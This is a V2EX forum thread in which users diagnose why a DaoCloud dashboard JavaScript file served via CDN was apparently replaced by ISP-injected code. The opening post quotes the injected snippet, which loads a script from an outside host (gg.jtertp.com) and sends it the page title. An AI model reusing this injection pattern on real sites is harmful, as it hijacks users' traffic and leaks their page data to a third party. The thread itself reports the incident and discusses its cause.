今天居然遇到了 DaoCloud 被 HTTPS 劫持?

2015-11-04 21:45:45 +08:00
 wzxjohn
今天访问 DaoCloud 的时候突然控制面板卡吃豆人了,仔细一看发现居然是因为加载了 HTTP 的资源被 Chrome 拦住了,打开控制台发现是这个 JS :
https://dn-daodashboard-prod.qbox.me/app/958e675a.app.js
正常情况应该是一大串,但是我得到的是:

document.write("<script language='javascript' src='http://dn-daodashboard-prod.qbox.me/app/958e675a.app.js?_vv=20080808'></script>");if(top.location==self.location){document.write("<script language='javascript' src='http://gg.jtertp.com:7777/rs/rs.php?src=p0005&t="+encodeURIComponent(document.title)+"&ci=140380449942919'></script>");}

搜了一下发现 gg.jtertp.com 似乎是电信的劫持?感觉真是好奇怪!电信居然已经可以进行 HTTPS 劫持了?!
求各路大神分析原因。。。
PS :证书应该没有问题,是 GeoTrust 的。
PSS :科学上网出国之后无此现象,不挂科学上网同网络环境下 3 台机器不同浏览器均出现这个现象
1544 次点击
所在节点    问与答
12 条回复
Laforet
2015-11-04 21:53:07 +08:00
把证书保存出来对比一下。

不过看你的描述应该是那个域名上所有的请求都被劫持到了 http 上才会出现混合内容
hgc81538
2015-11-04 21:59:22 +08:00
應該是源被劫持了
https://www.v2ex.com/t/212885
lhbc
2015-11-04 23:34:56 +08:00
某 CDN 回源被劫持
运营商真变态啊, IDC 之间的网络也搞劫持
运营商为推广全面 https 化真是费尽心机啊
wzxjohn
2015-11-04 23:47:39 +08:00
@Laforet 这样的话证书就不可能对了,所以肯定不是全劫持到 HTTP
@hgc81538
@lhbc 我看了那篇文章,但是这个不能解释为啥连七牛返回的 Header 都被改掉了。。。
hgc81538
2015-11-04 23:58:29 +08:00
@wzxjohn 因為運營商劫持了源與 cdn 的流量,它想更改什麼都可以
Laforet
2015-11-05 05:30:02 +08:00
@lhbc
@wzxjohn
@hgc81538

长见识了,居然这样也可以
wzxjohn
2015-11-05 09:38:10 +08:00
@hgc81538 劫持回源流量怎么可能 CDN 服务器返回的 Header 也被改了。。。
hgc81538
2015-11-05 10:21:39 +08:00
@wzxjohn 用戶請求文件, cdn 沒文件找源, cdn 向源請求文件,運營商劫持通訊, cdn 收到被竄改的內容,包括 header
wzxjohn
2015-11-05 10:23:31 +08:00
@hgc81538 你还是没懂我的意思,本身七牛 CDN 服务器会返回一些固定的头,但是被劫持的文件却没有这些头。。。
Senorsen
2016-11-05 12:00:50 +08:00
可怕,我说怎么最近 daocloud 首页这么卡…

CDN 回源时劫持,真是个厉害的新套路
Senorsen
2016-11-05 12:02:39 +08:00
呃… 居然是个老帖
wzxjohn
2016-11-05 12:26:52 +08:00
@Senorsen 哈哈哈~很久之前啦~

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/233684

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX